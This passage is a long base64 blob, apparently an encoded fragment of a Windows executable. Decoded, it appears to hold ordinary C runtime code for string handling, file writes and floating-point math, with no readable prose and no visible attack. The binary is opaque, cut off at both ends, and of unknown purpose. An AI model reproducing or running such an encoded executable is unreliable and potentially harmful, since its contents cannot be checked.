/o7+3Yli40A////U1f/FVhGBxD/lQD///+LlQT///+DxAiFwHTZO99yL4u1AP///yv6O738/v//dhlTV4vO/xVYRgcQ/9aLlQT///+DxAiFwHTdi7X0/v//i5UI////i8eLnfz+//+LyivOK8M7wXw5O99zGIuF+P7//4mchQz///+JfIWEQImF+P7//4u9BP///zvyc0yLzou1AP///4mN/P7//+lq/f//O/JzGIuF+P7//4m0hQz///+JVIWEQImF+P7//4uN/P7//4u1AP///zvPcxWL14u9BP///+kr/f//i7UA////6waLvQT///+Lhfj+//+D6AGJhfj+//94FouMhQz///+LVIWEiY38/v//6fb8//9bi038XzPNXuifZf7/i+Vdw4v/VYvsUYtVFItNCFaF0nUNhcl1DTlNDHUhM8DrLoXJdBmLRQyFwHQShdJ1BIgR6+mLdRCF9nUZxgEA6J9b//9qFl6JMOheWP//i8Zei+Vdw1Mr8YvYV4v5g/r/dRGKBD6IB0eEwHQlg+sBdfHrHooEPogHR4TAdAqD6wF0BYPqAXXshdKLVRR1A8YHAF+F21t1h4P6/3UNi0UMalDGRAH/AFjrp8YBAOgyW///aiLrkYv/VYvsXelE////zMzMzMzMzMzMzFWL7FYzwFBQUFBQUFBQi1UMjUkAigIKwHQJg8IBD6sEJOvxi3UIi/+KBgrAdAyDxgEPowQkc/GNRv+DxCBeycOL/1WL7GoA/3UM/3UI6AUAAACDxAxdw4v/VYvsg+wQg30IAHUU6K9a///HABYAAADobVf//zPA62dWi3UMhfZ1EuiTWv//xwAWAAAA6FFX///rBTl1CHIEM8DrQ/91EI1N8OgMhf7/i1X4g3oIAHQcjU7/STlNCHcKD7YB9kQQGQR18IvGK8GD4AEr8E6AffwAdAqLTfCDoVADAAD9i8Zei+Vdw+gksP//M8mEwA+UwYvBw4v/VYvsoQiTChCFwHUGXen04v//agD/dRD/dQz/dQjoBQAAAIPEEF3Di/9Vi+yD7BCNTfBTVlf/dRTogYT+/4tFEIXAdQcz9umNAAAAi00Ihcl0B4tVDIXSdRfoxln//8cAFgAAAOiEVv//vv///3/raL7///9/O8Z2EuimWf//xwAWAAAA6GRW///rTYt99IufpAAAAIXbdRONdfRWUFJR6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